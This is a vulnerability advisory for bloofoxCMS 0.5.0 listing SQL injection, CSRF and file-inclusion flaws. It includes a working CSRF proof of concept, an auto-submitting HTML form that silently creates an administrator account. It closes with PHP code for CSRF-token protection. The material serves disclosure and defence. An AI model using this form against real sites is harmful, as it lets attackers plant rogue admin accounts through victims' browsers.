source: https://www.securityfocus.com/bid/65019/info

bloofoxCMS is prone to the following security vulnerabilities:

1. Multiple SQL-injection vulnerabilities
2. Multiple cross-site request forgery vulnerabilities
3. A local file-include vulnerability

Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code or bypass certain security restrictions to perform unauthorized actions.

bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected.

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/admin/index.php?mode=user&action=new">
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="pwdconfirm" value="123456"/>
<input type="hidden" name="3" value="Admin"/>
<input type="hidden" name="blocked" value="0"/>
<input type="hidden" name="deleted" value="0"/>
<input type="hidden" name="status" value="1"/>
<input type="hidden" name="login_page" value="0"/>
<input type="hidden" name="send" value="Add User"/>
</form>
</body>
</html>
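
The [Add Admin] form above works because every field the user-creation request needs is a fixed value that any third-party page can supply. The usual server-side fix is a per-session token checked on every state-changing POST; the sketch below is an added example, not bloofoxCMS code, and the helper names and the csrf_token field name are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not bloofoxCMS code. csrf_token(), csrf_field(),
// csrf_valid() and csrf_require() are hypothetical helper names.

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        // 256 bits from the OS CSPRNG; unpredictable to other origins.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden input to embed in every state-changing admin form. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '"/>';
}

/** Constant-time comparison; rejects missing, empty or non-string values. */
function csrf_valid($expected, $submitted): bool
{
    return is_string($expected) && $expected !== ''
        && is_string($submitted)
        && hash_equals($expected, $submitted);
}

/** Call first in any handler that changes state (e.g. creating a user). */
function csrf_require(): void
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        http_response_code(405); // state changes must not ride on GET
        exit('Method not allowed');
    }
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (!csrf_valid($_SESSION['csrf_token'] ?? null, $_POST['csrf_token'] ?? null)) {
        http_response_code(403); // an auto-submitted cross-site form lands here
        exit('Invalid or missing CSRF token');
    }
}
```

With csrf_require() called before the user-creation logic and csrf_field() emitted in the legitimate admin form, a cross-site form that carries only the static fields is rejected with 403.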